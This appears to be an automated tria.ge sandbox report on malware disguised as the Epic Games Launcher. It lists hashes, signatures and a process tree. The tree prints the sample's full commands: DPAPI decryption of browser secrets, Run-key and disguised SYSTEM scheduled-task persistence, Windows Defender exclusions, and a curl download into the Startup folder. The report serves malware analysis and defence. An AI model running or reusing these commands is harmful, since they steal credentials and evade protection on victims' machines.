Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
7Static
static
3External 4.2.5.exe
windows10-2004-x64
7External 4.2.5.exe
windows11-21h2-x64
7$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...ls.dll
windows11-21h2-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows11-21h2-x64
3EpicGamesLauncher.exe
windows10-2004-x64
7EpicGamesLauncher.exe
windows11-21h2-x64
7LICENSES.c...m.html
windows10-2004-x64
1LICENSES.c...m.html
windows11-21h2-x64
1d3dcompiler_47.dll
windows10-2004-x64
1d3dcompiler_47.dll
windows11-21h2-x64
1ffmpeg.dll
windows10-2004-x64
1ffmpeg.dll
windows11-21h2-x64
1libEGL.dll
windows10-2004-x64
1libEGL.dll
windows11-21h2-x64
1libGLESv2.dll
windows10-2004-x64
1libGLESv2.dll
windows11-21h2-x64
1locales/uk.ps1
windows10-2004-x64
1locales/uk.ps1
windows11-21h2-x64
1resources/elevate.exe
windows10-2004-x64
1resources/elevate.exe
windows11-21h2-x64
1vk_swiftshader.dll
windows10-2004-x64
1vk_swiftshader.dll
windows11-21h2-x64
1vulkan-1.dll
windows10-2004-x64
1vulkan-1.dll
windows11-21h2-x64
1$PLUGINSDI...7z.dll
windows10-2004-x64
3$PLUGINSDI...7z.dll
windows11-21h2-x64
3Analysis
-
max time kernel
90s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2024, 18:28
Static task
static1
Behavioral task
behavioral1
Sample
External 4.2.5.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral2
Sample
External 4.2.5.exe
Resource
win11-20231215-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win11-20231222-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win11-20231215-en
Behavioral task
behavioral7
Sample
EpicGamesLauncher.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral8
Sample
EpicGamesLauncher.exe
Resource
win11-20231215-en
Behavioral task
behavioral9
Sample
LICENSES.chromium.html
Resource
win10v2004-20231215-en
Behavioral task
behavioral10
Sample
LICENSES.chromium.html
Resource
win11-20231215-en
Behavioral task
behavioral11
Sample
d3dcompiler_47.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral12
Sample
d3dcompiler_47.dll
Resource
win11-20231215-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral14
Sample
ffmpeg.dll
Resource
win11-20231215-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral16
Sample
libEGL.dll
Resource
win11-20231222-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20231222-en
Behavioral task
behavioral18
Sample
libGLESv2.dll
Resource
win11-20231215-en
Behavioral task
behavioral19
Sample
locales/uk.ps1
Resource
win10v2004-20231215-en
Behavioral task
behavioral20
Sample
locales/uk.ps1
Resource
win11-20231215-en
Behavioral task
behavioral21
Sample
resources/elevate.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral22
Sample
resources/elevate.exe
Resource
win11-20231215-en
Behavioral task
behavioral23
Sample
vk_swiftshader.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral24
Sample
vk_swiftshader.dll
Resource
win11-20231215-en
Behavioral task
behavioral25
Sample
vulkan-1.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral26
Sample
vulkan-1.dll
Resource
win11-20231215-en
Behavioral task
behavioral27
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral28
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win11-20231222-en
General
-
Target
EpicGamesLauncher.exe
-
Size
154.9MB
-
MD5
928282456673e0a194360f9d411f165d
-
SHA1
9820bd055f95d157fdbdc973bfc955c282a18c29
-
SHA256
5088d3e4c0b15af2cdd00ab98ca1cdd273cce489b7ac610d4ddda1f1f8154b82
-
SHA512
c71623dd5396c89bf3d163451cb0c47d26181d4e4136c041cc888c78ef770d944a64c505efdbbe94bd09456c5b072845f98d3e5b3bcf68075cacb6bd1dfc1753
-
SSDEEP
1572864:HCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:nDAgZi
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation EpicGamesLauncher.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cscript.exe -
Loads dropped DLL 1 IoCs
pid Process 4944 EpicGamesLauncher.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EpicGamesLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EpicGamesLauncher.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 26 discord.com 27 discord.com 28 discord.com 35 discord.com 36 discord.com -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 2600 cmd.exe 3716 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4340 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1248 tasklist.exe 4248 tasklist.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2764 reg.exe 3684 reg.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4632 powershell.exe 4632 powershell.exe 4468 powershell.exe 4468 powershell.exe 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 1220 powershell.exe 1220 powershell.exe 1220 powershell.exe 4944 EpicGamesLauncher.exe 4944 EpicGamesLauncher.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
description pid Process Token: SeDebugPrivilege 1248 tasklist.exe Token: SeDebugPrivilege 4248 tasklist.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 1220 powershell.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe Token: SeShutdownPrivilege 4944 EpicGamesLauncher.exe Token: SeCreatePagefilePrivilege 4944 EpicGamesLauncher.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4944 wrote to memory of 1576 4944 EpicGamesLauncher.exe 88 PID 4944 wrote to memory of 1576 4944 EpicGamesLauncher.exe 88 PID 1576 wrote to memory of 1248 1576 cmd.exe 89 PID 1576 wrote to memory of 1248 1576 cmd.exe 89 PID 4944 wrote to memory of 2384 4944 EpicGamesLauncher.exe 91 PID 4944 wrote to memory of 2384 4944 EpicGamesLauncher.exe 91 PID 4944 wrote to memory of 4960 4944 EpicGamesLauncher.exe 94 PID 4944 wrote to memory of 4960 4944 EpicGamesLauncher.exe 94 PID 4944 wrote to memory of 2600 4944 EpicGamesLauncher.exe 93 PID 4944 wrote to memory of 2600 4944 EpicGamesLauncher.exe 93 PID 2384 wrote to memory of 4792 2384 cmd.exe 97 PID 2384 wrote to memory of 4792 2384 cmd.exe 97 PID 4960 wrote to memory of 4248 4960 cmd.exe 98 PID 4960 wrote to memory of 4248 4960 cmd.exe 98 PID 2600 wrote to memory of 4632 2600 cmd.exe 99 PID 2600 wrote to memory of 4632 2600 cmd.exe 99 PID 4944 wrote to memory of 3716 4944 EpicGamesLauncher.exe 100 PID 4944 wrote to memory of 3716 4944 EpicGamesLauncher.exe 100 PID 3716 wrote to memory of 4468 3716 cmd.exe 103 PID 3716 wrote to memory of 4468 3716 cmd.exe 103 PID 4944 wrote to memory of 2672 4944 EpicGamesLauncher.exe 107 PID 4944 wrote to memory of 2672 4944 EpicGamesLauncher.exe 107 PID 2672 wrote to memory of 4340 2672 cmd.exe 105 PID 2672 wrote to memory of 4340 2672 cmd.exe 105 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 3168 4944 EpicGamesLauncher.exe 104 PID 4944 wrote to memory of 4504 4944 EpicGamesLauncher.exe 109 PID 4944 wrote to memory of 4504 4944 EpicGamesLauncher.exe 109 PID 4504 wrote to memory of 3288 4504 cmd.exe 110 PID 4504 wrote to memory of 3288 4504 cmd.exe 110 PID 4944 wrote to memory of 4996 4944 EpicGamesLauncher.exe 111 PID 4944 wrote to memory of 4996 4944 EpicGamesLauncher.exe 111 PID 3288 wrote to memory of 2464 3288 cscript.exe 113 PID 3288 wrote to memory of 2464 3288 cscript.exe 113 PID 2464 wrote to memory of 2764 2464 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"2⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f3⤵PID:4792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,192,175,247,102,90,208,4,240,138,90,143,203,80,163,0,13,49,15,225,91,73,243,187,128,250,106,67,220,20,183,238,93,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,202,130,214,178,63,66,10,90,87,20,232,137,138,62,39,164,64,195,193,57,56,16,94,10,230,88,187,206,60,90,135,206,48,0,0,0,124,8,92,113,89,139,235,23,157,133,234,106,177,79,59,186,142,56,17,66,139,112,64,187,31,220,20,216,138,203,176,248,155,15,237,54,185,55,80,119,224,28,129,247,27,19,158,217,64,0,0,0,214,161,169,216,58,203,9,234,138,90,200,179,105,214,227,237,175,233,155,102,99,3,231,126,196,36,170,165,135,39,43,83,255,43,212,63,42,214,50,45,28,119,231,156,71,234,111,148,255,235,64,215,246,231,45,220,57,205,160,239,28,51,231,37), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,93,5,165,72,158,86,199,78,170,107,57,171,8,49,161,31,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,186,255,119,95,163,32,239,108,241,228,171,185,238,69,126,164,58,126,252,186,104,78,252,226,40,240,40,209,84,31,141,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,233,221,103,215,54,135,208,118,201,165,218,71,27,56,205,159,34,193,41,61,232,44,48,86,184,49,132,90,67,155,86,48,0,0,0,93,244,22,199,209,170,222,110,51,245,0,12,158,51,30,191,109,181,10,191,62,213,224,84,172,143,91,96,138,43,155,187,239,7,96,73,207,215,195,250,17,109,171,171,61,181,203,188,64,0,0,0,21,78,251,21,120,144,110,104,151,213,255,237,240,17,18,169,145,25,76,140,241,245,213,152,38,92,79,109,232,124,151,242,197,236,225,74,118,208,79,241,16,17,138,83,248,139,175,197,196,59,108,108,126,58,76,32,112,117,159,82,178,232,154,135), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1792 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:3168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵
- Suspicious use of WriteProcessMemory
PID:2672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs""2⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\system32\cscript.execscript //B //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe""5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EpicGamesLauncher"5⤵
- Modifies registry key
PID:3684
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exemple.exe" YOUR-DIRECT-DOWNLOAD-HERE5⤵PID:224
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe"C:\Users\Admin\AppData\Local\Temp\EpicGamesLauncher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15820112774290457853,11478009095939111221,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵PID:4996
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM1⤵
- Creates scheduled task(s)
PID:4340
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f48896adf9a23882050cdff97f610a7f
SHA14c5a610df62834d43f470cae7e851946530e3086
SHA2563ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA51216644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
-
Filesize
1KB
MD5c428399b96e965ae61cee1ba767fd9d9
SHA18964316b735c23fca792ba85354eacdd8dbb5e35
SHA25614053c0f27a0c695462fad737c6b0c9810dce4472835977e9f08bca3ef0f7462
SHA5125ef32b49b638dca1e5e4adf3c1823a23735c6539d06092e46bdbf97f23b2e4201455ab5e01a019167cd0c80865411ea4fb1e67cc25a3bb58989834a7a34956f7
-
Filesize
1KB
MD5f0314381ee333795efb86f015c87b7c7
SHA1d70a44581617e6201726846a23fc71b769cc46da
SHA2564f5459942b4bf6f19cd373079bd58e2796c94fd3393f77376170fd39e39e37d1
SHA51256c6074e7e5604e1c76cc147e9d0811195070b01d1979cd620e37bc636a6be3a36f25f3c48ede403f0a4a359b5693ccef9d222a7814fe5cc658c70d732295099
-
Filesize
944B
MD5353510dff0bdd241051e5b066ea0d884
SHA1a84ea8d61e491d654fa3265cd5fe31bf2737c1c2
SHA256aae6f17564f0d5bb849dfac3faf237f3c6dd5aa2b8adc888d2c2dd6ce58fe33a
SHA512bb6d9c993e93dd816adb0f1ff73a92219823419251acb1cbad626fa8c5070e94b1dd5f1fb77e58bb946e66a2ab4997474fd1a985fb1ba92321def7d8abe4bcd1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD53072b68e3c226aff39e6782d025f25a8
SHA1cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA2567fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA51261ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
-
Filesize
1KB
MD5c18c10cb23ca6e5490be6eb2fb1a1ddc
SHA14a3082ddd4851da7db0b8527c31b2ba23877c011
SHA256a58332b95f300a9b5d1309bfc18e5b97b59c1b94145064aeedaf6e9718022b9d
SHA512537462aebe04acd652f310c684b2b562d72665f2b379b830ff15f069603f3ff0229ea65504f0e53f3cb983eeae1de01c4c0518281fe31cef5a890eecc4e2b1bb
-
Filesize
167B
MD5323e6511a0f7e82c511ea954d1530b13
SHA18b167e573b0663d1bc5a60f0d7b3f267f0bc1a20
SHA25648a92c93fb07c8f059e0622ce2a95e32726d02fcb23f7bfb384374e636518597
SHA512757163f84f9352bef973c6a7a994dc4a8492d224820ca5c86e572ed67b3bbe6049444d2a07b08c9efd4bb59b9e5e52ba3fdd397f01f55ddfcf3a5ae3d07ebf6a